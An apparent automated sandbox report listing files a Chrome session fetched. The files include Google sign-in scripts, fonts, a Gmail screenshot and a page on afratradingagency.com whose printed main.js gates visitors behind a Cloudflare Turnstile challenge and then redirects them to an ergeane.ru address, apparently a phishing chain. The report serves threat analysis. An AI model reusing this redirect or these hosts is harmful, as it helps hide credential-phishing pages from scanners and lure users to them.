                                                                                                                                                                                                                                  URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1694)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33469
                                                                                                                                                                                                                                  Entropy (8bit):5.388988281117536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:bnssyVDN2iKgzyswVEOZvg6aGTSEHiFmamZ9KYhJzjvq7Hp:bMuEOYGTSEHiFg9KUn0
                                                                                                                                                                                                                                  MD5:1FCE839AACA06EEA82069847F8AFB0A5
                                                                                                                                                                                                                                  SHA1:AC0A1CC3A2650021408581B279D2B3942298AC16
                                                                                                                                                                                                                                  SHA-256:B1B1214D10C6C1D17C2B11A1C0F6B8B60AA3864EA231A950E4AF491D03A6B9D1
                                                                                                                                                                                                                                  SHA-512:4648412B338EECC612EA2A1DA342E64C62E1B2B1CABFC524C7222A06CEFF770847B7EA28D88EE2FF04344597907FCCD88226F9BD7999184003521FCF6ACC130D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var Fua=function(a,b){this.da=a;this.fa=b;if(!c){var c=new _.fg("//www.google.com/images/cleardot.gif");_.Sm(c)}this.oa=c};_.h=Fua.prototype;_.h.kd=null;_.h.m0=1E4;_.h.iC=!1;_.h.XS=0;_.h.hM=null;_.h.eX=null;_.h.setTimeout=function(a){this.m0=a};_.h.start=function(){if(this.iC)throw Error("sc");this.iC=!0;this.XS=0;Gua(this)};_.h.stop=function(){Hua(this);this.iC=!1};.var Gua=function(a){a.XS++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.on((0,_.Ng)(a.rJ,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.Ng)(a.uma,a),a.aa.onerror=(0,_.Ng)(a.tma,a),a.aa.onabort=(0,_.Ng)(a.sma,a),a.hM=_.on(a.vma,a.m0,a),a.aa.src=String(a.oa))};_.h=Fua.prototype;_.h.uma=function(){this.rJ(!0)};_.h.tma=function(){this.rJ(!1)};_.h.sma=function(){this.rJ(!1)};_.h.vma=function(){this.rJ(!1)};._.h.rJ=function(a){Hua(this);a?(this.iC=!1,this.da.call(this.fa,!0)):this.XS<=0?Gua(this):(this.iC=!1,
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15344
                                                                                                                                                                                                                                  Entropy (8bit):7.984625225844861
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                                                                                                                                                                  MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                                                                                                  SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                                                                                                  SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                                                                                                  SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                  Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):320
                                                                                                                                                                                                                                  Entropy (8bit):4.908670547884398
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:HtW9lD+/98MPpC7T1Q2lvTHodNXpKpWgLZmUemmHl0WuEQwK59n:NWqeMsvLq87ZmHxHmrVR59n
                                                                                                                                                                                                                                  MD5:70978E56D82A2A66B672DCED84F2723A
                                                                                                                                                                                                                                  SHA1:7CF666780F42F97EF0A20D453F158AFB6612FA01
                                                                                                                                                                                                                                  SHA-256:E5191EEC3AC3CEE3567555742B9F94698485B87077E39FB637506E8CAC249F95
                                                                                                                                                                                                                                  SHA-512:25BF116C3932A9E6897A29708C9C4ACCB49816CB6906BF0F14D1284A514ECAC98CF39B785A27CD5BA269106628687FC95222CB68AA9BDB5591332070A422FF9D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:window.onloadTurnstileCallback = function () {.. turnstile.render('#myWidget', {.. sitekey: '0x4AAAAAAA3CjQARFbjEVtU4',.. callback: function(token) {.. console.log('Challenge Success ${token}');.. window.location.href = "https://32.ergeane.ru/yNriUGk0/";.. },.. });.. };
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):52280
                                                                                                                                                                                                                                  Entropy (8bit):7.995413196679271
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
                                                                                                                                                                                                                                  MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                                                                                                                                                                                                                                  SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                                                                                                                                                                                                                                  SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                                                                                                                                                                                                                                  SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
                                                                                                                                                                                                                                  Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9198
                                                                                                                                                                                                                                  Entropy (8bit):5.399529272194982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:TlQGB2uz4p/Cx5RTFgTExEms9tmuUgHmiUBEDPhy43+Z/c:T0uzlGExvs9tfUgH3EWyU+Z/c
                                                                                                                                                                                                                                  MD5:9551546DAB4BE6B87A268CEE5DD451C4
                                                                                                                                                                                                                                  SHA1:D3318BF3D7AE55C27D40E82F7F5126659D6F28E7
                                                                                                                                                                                                                                  SHA-256:DFD993FA70257087905E730B44385714791173A99FF23B0F4B60E281E5D1F6C0
                                                                                                                                                                                                                                  SHA-512:02592605D14CB7EFD09EB0011475DFAF8ACDF9E0F9F1D1FD2AE5031F7478FAE6835CC87C7EC3A53C58AB7878551E486C108B6474FE18BD53F7E3723EF62ABD87
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/ck=boq-identity.AccountsSignInUi.LKDR6mlAzks.L.B1.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/exm=AvtSve,CMcBD,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,MpJwZc,NOeYWe,O6y8ed,PrPYRd,Rkm0ef,SCuOPb,STuCOe,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,byfTOb,cYShmd,eVCnO,hc6Ubd,inNHtf,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,qmdT9,siKnQd,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGArwG7Kxzg65_VsZCF0RXYsD32Uw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=ltDFwf,SD8Jgb,rmumx,E87wgc,qPYxq,Tbb4sb,pxq3x,f8Gu1e,soHxf,YgOFye,yRXbo,bTi8wc,ywOR5c,PHUIyb"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.zOa=_.z("SD8Jgb",[]);._.GW=function(a,b){if(typeof b==="string")a.zc(b);else if(b instanceof _.Yp&&b.ia&&b.ia===_.C)b=_.Za(b.lw()),a.empty().append(b);else if(b instanceof _.Va)b=_.Za(b),a.empty().append(b);else if(b instanceof Node)a.empty().append(b);else throw Error("ng");};_.HW=function(a){var b=_.Dp(a,"[jsslot]");if(b.size()>0)return b;b=new _.Bp([_.xl("span")]);_.Ep(b,"jsslot","");a.empty().append(b);return b};_.xSb=function(a){return a===null||typeof a==="string"&&_.hj(a)};._.k("SD8Jgb");._.MW=function(a){_.W.call(this,a.La);this.Xa=a.controller.Xa;this.Xc=a.controllers.Xc[0]||null;this.header=a.controller.header;this.nav=a.controller.nav;var b;(b=this.Aa().find("button:not([type])").el())==null||b.setAttribute("type","button")};_.K(_.MW,_.W);_.MW.Ca=function(){return{controller:{Xa:{jsname:"n7vHCb",ctor:_.Rv},header:{jsname:"tJHJj",ctor:_.Rv},nav:{jsname:"DH6Rkf",ct
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (673)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1338
                                                                                                                                                                                                                                  Entropy (8bit):5.243029852702644
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kMYD7lOZDV7NJQ5L0Ywnp/cKC7X/1JToJdlVuEoRGbLxYVGbACSFXVzOmWeqcprw:o7oXY5wI/1Rw1uEoRGbLxaGbnSBVI6rw
                                                                                                                                                                                                                                  MD5:BA5BFA7AAAFFC34B19C14D81676B4FCD
                                                                                                                                                                                                                                  SHA1:C1480156923239D30748C08BD541B80817E8B3AB
                                                                                                                                                                                                                                  SHA-256:ED78D4EDF5F5F859595B8E1ACA36D8004137B0A8723D8B809884182F76A6BA23
                                                                                                                                                                                                                                  SHA-512:B274DAA26151F778B796BE1ED8F2183D3A6947F42D9F1E725CFEA74E1447F304B2FD2C6A526BA63CC93044AC35376409A20DA21181442A012C59CED728EA0910
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/ck=boq-identity.AccountsSignInUi.LKDR6mlAzks.L.B1.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGArwG7Kxzg65_VsZCF0RXYsD32Uw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=P6sQOc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("P6sQOc");.var g2a=!!(_.ii[0]>>28&1);var i2a=function(a,b,c,d,e){this.fa=a;this.Ba=b;this.oa=c;this.Da=d;this.Ea=e;this.aa=0;this.da=h2a(this)},j2a=function(a){var b={};_.Pa(a.ZU(),function(e){b[e]=!0});var c=a.KU(),d=a.SU();return new i2a(a.RR(),c.aa()*1E3,a.oU(),d.aa()*1E3,b)},h2a=function(a){return Math.random()*Math.min(a.Ba*Math.pow(a.oa,a.aa),a.Da)},k2a=function(a,b){return a.aa>=a.fa?!1:b!=null?!!a.Ea[b]:!0};var l2a=function(){this.da=_.Mu(_.c2a);this.fa=_.Mu(_.a2a);var a=_.Mu(_.Q1a);this.fetch=a.fetch.bind(a)};l2a.prototype.aa=function(a,b){if(this.fa.getType(a.Xd())!==1)return _.Mn(a);var c=this.da.fX;return(c=c?j2a(c):null)&&k2a(c)?_.Wya(a,m2a(this,a,b,c)):_.Mn(a)};.var m2a=function(a,b,c,d){return c.then(function(e){return e},function(e){if(g2a)if(e instanceof _.yf){if(!e.status||!k2a(d,e.status.xc()))throw e;}else{if("function"==typeof _.Ks&&e instanceof _.Ks&
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                                                  Entropy (8bit):3.6534652184263736
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
                                                                                                                                                                                                                                  MD5:F3418A443E7D841097C714D69EC4BCB8
                                                                                                                                                                                                                                  SHA1:49263695F6B0CDD72F45CF1B775E660FDC36C606
                                                                                                                                                                                                                                  SHA-256:6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
                                                                                                                                                                                                                                  SHA-512:82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2768)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21434
                                                                                                                                                                                                                                  Entropy (8bit):5.3955761453461815
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E19QnqywT3PJSzjXEMuvCq+hIulfKcyNkCfUca8RQ0Gp5fYLDFgDOpjOq:E19QnXwTBiEMuvCq+GMypfU58RQ0Gp2T
                                                                                                                                                                                                                                  MD5:82C4A5602061F4DD9827DFB8D372F50D
                                                                                                                                                                                                                                  SHA1:3F43DCB1E2C76AF2DE5393B741B161C8551C7EA4
                                                                                                                                                                                                                                  SHA-256:1BFE79EDB9C5AB086CBBFE9BD3E57908E46BCEC22EFB981FF6929319BDAD30EF
                                                                                                                                                                                                                                  SHA-512:B171650A2BCFF3067465EAB5C50A62FD52C8D6AC64C89D73E03E19CB898D93DBCB7492E19DD08A1E3D3B3BAB8E19712C93F15FDEEC05F00D7A7605C9F5B1E8D9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{.var nIa;._.pIa=function(){var a=nIa(_.Le("xwAfE"),function(){return _.Le("UUFaWc")}),b=nIa(_.Le("xnI9P"),function(){return _.Le("u4g7r")}),c,d,e,f;return(f=oIa)!=null?f:oIa=Object.freeze({isEnabled:function(g){return g===-1||_.rf(_.Le("iCzhFc"),!1)?!1:a.enabled||b.enabled},environment:(c=_.il(_.Le("y2FhP")))!=null?c:void 0,TS:(d=_.il(_.Le("MUE6Ne")))!=null?d:void 0,At:(e=_.il(_.Le("cfb2h")))!=null?e:void 0,Yp:_.kl(_.Le("yFnxrf"),-1),n2:_.TFa(_.Le("fPDxwd")).map(function(g){return _.kl(g,0)}).filter(function(g){return g>0}),.c7:a,fya:b})};nIa=function(a,b){a=_.rf(a,!1);return{enabled:a,PX:a?_.Nd(_.ll(b(),_.Lz)):qIa()}};_.Lz=function(a){this.Ha=_.u(a)};_.K(_.Lz,_.v);var qIa=function(a){return function(){return _.sd(a)}}(_.Lz);var oIa;._.k("p3hmRc");.var ZIa=function(a){a.Ea=!0;return a},$Ia=function(a,b,c,d){this.transport=a;this.aa=b;this.da=c;this.environment=d;this.fa=Number
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):612
                                                                                                                                                                                                                                  Entropy (8bit):4.988321743922674
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:hPG4yvjS5SSavmmMcw2osZdr8+HskwGWuMCcf0+uNV4Gb:hPxR5SPvGYdrRWuMC2uNV4M
                                                                                                                                                                                                                                  MD5:90FCE18E5EF426EA4D79AA9F3553FB96
                                                                                                                                                                                                                                  SHA1:2FC864EA0F46AB0D95AC9FE00A01E4280D780FFF
                                                                                                                                                                                                                                  SHA-256:59EACA076136932EC883A42164BEB703DB25C1616F2D6759A0AF2A620C170157
                                                                                                                                                                                                                                  SHA-512:7AF35051E65E9D2CB330102AD3CD671E2285858DA2E0AD3BFABBEBBD5987E6BFBF449F2E42FE7C5FD0F0A50998497F1CA428EA7A8E39E6C5453D4DAA6E10D1CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Document</title>..<style>.. div {.. display: flex;.. align-items: center;.. justify-content: center;.. width: 90vw;.. height: 85vh;.. background-color: white;.. flex-direction: row;.. }..</style>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script>..</head>....<body>....<div id="myWidget"></div>...... <script src="main.js"></script> ..</body>....</html>
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):106290
                                                                                                                                                                                                                                  Entropy (8bit):7.99716969201618
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:ibuyn9NZDLjSk2CB8bAsKDFN8+OUwNuuYWpq:y9NtjzKkpN8VLu+M
                                                                                                                                                                                                                                  MD5:428183BFB7C31D8C3BCC985DAC004681
                                                                                                                                                                                                                                  SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                                                                                                                                                                                                                                  SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                                                                                                                                                                                                                                  SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://cdn.prod.website-files.com/5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp
                                                                                                                                                                                                                                  Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52916
                                                                                                                                                                                                                                  Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                  MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                  SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
